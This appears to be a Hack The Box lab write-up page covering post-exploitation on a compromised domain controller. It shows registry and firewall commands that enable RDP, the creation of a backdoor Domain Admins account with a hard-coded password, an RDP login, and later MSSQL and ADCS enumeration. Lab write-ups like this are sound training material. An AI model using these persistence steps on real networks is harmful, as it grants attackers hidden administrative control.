Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.
c:\Windows\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
c:\Windows\system32> netsh firewall add portopening TCP 3389 "Remote Desktop"
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.Starting a RDP service and opening up the port 3389
c:\Windows\system32> net user /ADD /Domain exec Qwer1234
The command completed successfully.
c:\Windows\system32> net groups /ADD /Domain "Domain Admins" exec
The command completed successfully.
c:\Windows\system32> net groups "Domain Admins"
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator exec
The command completed successfully.Creating an admin user; exec
┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ xfreerdp /u:exec /p:Qwer1234 /v:dc.sequel.htb /cert:ignore /dynamic-resolution /tls-seclevel:0MSSQL
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ wget -q https://aka.ms/ssmsfullsetup
*Evil-WinRM* PS C:\Users\exec\Desktop> copy \\10.10.14.20\smb\SSMS-Setup-ENU.exe .
There are only 2 users;
sa; default sysadminBUILTIN\Users; anyone who authenticates with Windows credentials
The server role is set to public for BUILTIN\Users
This indicates that members of the BUILTIN\Users group are allowed to connect to the SQL Server instance.
ADCS
The last 4 must be me
I cannot see the security property here
MMC to the rescue
Everything is set to Deny for the sql_svc user.
This is why I was initially unable to enumerate the AD templates earlier